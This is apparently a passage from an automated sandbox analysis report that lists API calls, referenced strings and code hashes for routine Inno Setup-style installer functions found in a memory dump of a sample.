                                                                                                                            • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                                            • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                                                                            • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                                            • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047CB94 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                            • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                                                            • API String ID: 1375471231-2952887711
                                                                                                                            • Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                                                            • Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
                                                                                                                            • Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                                                            • Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00423A84 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                                                            • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                                                            • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$EnumLongWindows
                                                                                                                            • String ID: \AB
                                                                                                                            • API String ID: 4191631535-3948367934
                                                                                                                            • Opcode ID: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                                                            • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                                                                                            • Opcode Fuzzy Hash: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                                                            • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004019CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021FE3A0,00001004,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                            • String ID: he
                                                                                                                            • API String ID: 730355536-1137534704
                                                                                                                            • Opcode ID: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                                                            • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                                                            • Opcode Fuzzy Hash: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                                                            • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042DE44 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registrylibraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
                                                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
                                                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressDeleteHandleModuleProc
                                                                                                                            • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                                                            • API String ID: 588496660-1846899949
                                                                                                                            • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                                                            • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                                                                                            • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                                                            • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046BB10 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 320COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • PrepareToInstall failed: %s, xrefs: 0046BE6E
                                                                                                                            • NextButtonClick, xrefs: 0046BC4C
                                                                                                                            • Need to restart Windows? %s, xrefs: 0046BE95
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                                                            • API String ID: 0-2329492092
                                                                                                                            • Opcode ID: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                                                            • Instruction ID: 9de4db1b3e70fdebeced0fe060001c857bcfdee1b2562a0b259a97201065334e
                                                                                                                            • Opcode Fuzzy Hash: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                                                            • Instruction Fuzzy Hash: 46D12F34A00108DFCB14EB99D985AED77F5EF49304F5440BAE404EB362D778AE85CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00483084 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
                                                                                                                            • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ActiveChangeNotifyWindow
                                                                                                                            • String ID: $Need to restart Windows? %s
                                                                                                                            • API String ID: 1160245247-4200181552
                                                                                                                            • Opcode ID: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                                                            • Instruction ID: 855c298393525188f16043e43c8caa20abfdb27870bda8f6eb76b0fac02994d3
                                                                                                                            • Opcode Fuzzy Hash: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                                                            • Instruction Fuzzy Hash: 7E918F34A042449FDB10EF69D8C6BAD77E0AF55708F5484BBE8009B362DB78AE05CB5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046FADC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                                            • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                                                            • String ID: Creating directory: %s
                                                                                                                            • API String ID: 2451617938-483064649
                                                                                                                            • Opcode ID: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                                            • Instruction ID: a145aa70eb484b5d007d33f2831cd5d1f219efd535f83afbcf26a903565c5eea
                                                                                                                            • Opcode Fuzzy Hash: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                                                            • Instruction Fuzzy Hash: 7D512F74E00248ABDB01DBA5D982ADEBBF4AF49304F50847AEC50B7382D7795E08CB59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00454DD4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressByteCharMultiProcWide
                                                                                                                            • String ID: SfcIsFileProtected$sfc.dll
                                                                                                                            • API String ID: 2508298434-591603554
                                                                                                                            • Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                                            • Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
                                                                                                                            • Opcode Fuzzy Hash: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                                                            • Instruction Fuzzy Hash: E8419671A04318DBEB20EF59DC85B9DB7B8AB4430DF5041B7A908A7293D7785F88CA1C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00452510 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • 74D31520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                                                                                            • 74D31500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
                                                                                                                            • 74D31540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D31500D31520D31540
                                                                                                                            • String ID: %E
                                                                                                                            • API String ID: 1003763464-175436132
                                                                                                                            • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                                            • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                                                                                            • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                                            • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0044B38C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 0044B401
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ObjectReleaseSelect
                                                                                                                            • String ID: %H
                                                                                                                            • API String ID: 1831053106-1959103961
                                                                                                                            • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                                            • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                                                                            • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                                            • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0044B0C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                                                                                            • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                                                                            • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DrawText$ByteCharMultiWide
                                                                                                                            • String ID: %H
                                                                                                                            • API String ID: 65125430-1959103961
                                                                                                                            • Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                                                            • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                                                                                            • Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                                                            • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042ED38 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                            • API String ID: 395431579-1506664499
                                                                                                                            • Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                                                            • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                                                                                            • Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                                                            • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00455A10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                                                                                            Strings
                                                                                                                            • PendingFileRenameOperations2, xrefs: 00455A4F
                                                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                                                                                            • PendingFileRenameOperations, xrefs: 00455A40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen
                                                                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                                            • API String ID: 47109696-2115312317
